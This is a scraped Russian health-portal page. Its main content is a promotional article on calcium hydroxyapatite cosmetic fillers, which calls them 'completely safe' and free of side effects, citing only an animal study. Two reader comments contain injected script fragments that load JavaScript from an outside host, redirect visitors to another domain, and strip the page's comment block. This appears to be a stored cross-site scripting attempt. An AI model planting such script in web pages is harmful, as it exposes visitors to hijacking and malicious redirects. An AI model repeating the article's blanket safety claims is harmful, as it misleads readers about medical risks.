Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Гидроксиапатит кальция – ...  >>  Гидроксиапатит кальция – революция в косметике? Или очередной обман?
 
Обратная связь
 

Гидроксиапатит кальция – революция в косметике? Или очередной обман?

Размер шрифта
27 февраля 2014 00:00
  • google_analytics: false
  • Нравится

Мы продолжаем рассказ о самых выдающихся достижениях косметологии в рамках специального проекта «Хочу быть красивой».

В вопросах поддержания красоты и молодости кожи стоит уделить внимание уникальным филлерам на основе гидроксиапатита кальция. Они обладают эффектом безоперационного лифтинга (то есть приподнимания) лица и долговременной коррекцией морщин, а также стимулируют процесс выработки собственного коллагена.

Но разберемся со всем по порядку. Чтобы выглядеть моложе, недостаточно просто избавиться от нежелательных морщин. Секрет молодости – это объемы, которые уходят с возрастом в виду процессов разрушения кожного коллагена. В молодости для описания кожи подходят такие эпитеты, как «плотная», «эластичная», «упругая», а контуры лиц молодых девушек четкие и симметричные. Можно сказать, что молодое лицо напоминает по форме латинскую букву «V» или треугольник, где подбородок – это вершина, а основание находится в области скул. Такую форму лица принято называть «треугольником красоты».

С возрастом кожа понемногу начинает терять былую упругость и эластичность, контур лица становится менее четким, а треугольник красоты переворачивается широким основанием к подбородку. И в таком случае уже неважно, есть ли глубоко заложенные морщины или нет, лицо выглядит постаревшим и усталым.

Филлеры с гидроксиапатитом кальция возвращают лицу молодую V-форму, благодаря ним восполняется утраченный объем, разглаживаются морщины, стимулируется выработка коллагена, а овал лица вновь приобретает четкие и симметричные границы.

Использование препаратов с гидроксиапатитом кальция позволяет:

  • восстановить объем в области скул и щек,

  • произвести омоложение кистей рук,

  • сделать коррекцию спинки носа (безоперационная ринопластика) и коррекцию овала лица и подбородка (безоперационный лифтинг),

  • устранить носогубные складки и морщины марионетки.

Принцип работы гидроксиапатита кальция

Как правило, при введении микросфер синтетического гидроксиапатита кальция (CaHA) используют также и водный гель-носитель.

Частицы гидроксиапатита кальция (CaHA) получают из зерен исходного вещества, соединяя их в ходе высокотемпературной обработки в микросферы одинаковой формы. Гель-носитель связывает микросферы.

Так выглядит морщина до инъекции.

После введения гель-носитель моментально восполняет объем и мгновенно разглаживает морщину.

Через 2-3 месяца макрофаги поглощают гель, остаются микросферы кальция, они стимулируют выработку нового коллагена, поверхность кожи остается ровной.

В коже клетки вырабатывают коллаген, формируя новый дермальный матрикс. Эта новая ткань в сочетании с частицами гидроксиапатита кальция CaHA как раз способствует большей продолжительности эффекта. Благодаря этому механизму эффект длится у пациентов от одного до двух лет.

Благодаря развитию собственной ткани эффект процедуры сохраняется в течение такого длительного промежутка времени.

Безопасность гидроксиапатита кальция CaHA

3-летнее исследование на животных с введением препарата периуретрально продемонстрировало, что он полностью безопасен.

Процедуры не вызывают побочных эффектов, так как гель с течением времени рассасывается, а микросферы CaHA остаются в месте инъекции и не мигрируют. Благодаря образованию в клетках слоя дермального матрикса, не происходит отторжение микросфер.  

* Иллюстративный материал предоставлен сайтом http://merz-aesthetics.ru/.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

28 апреля 2015 в 10:52

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:44

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как сделать себя красивой? Филлеры   Как правильно спать?   Еда может заставить вас светится от красоты! Что есть?!   Хотите испортить кому-то настроение – заставьте посмотреть на солнце!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что, кроме птичьего помета, входит в ваши кремы?
Как секс делает вас красивее
Как сделать себя красивой? Красота без разрезов

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.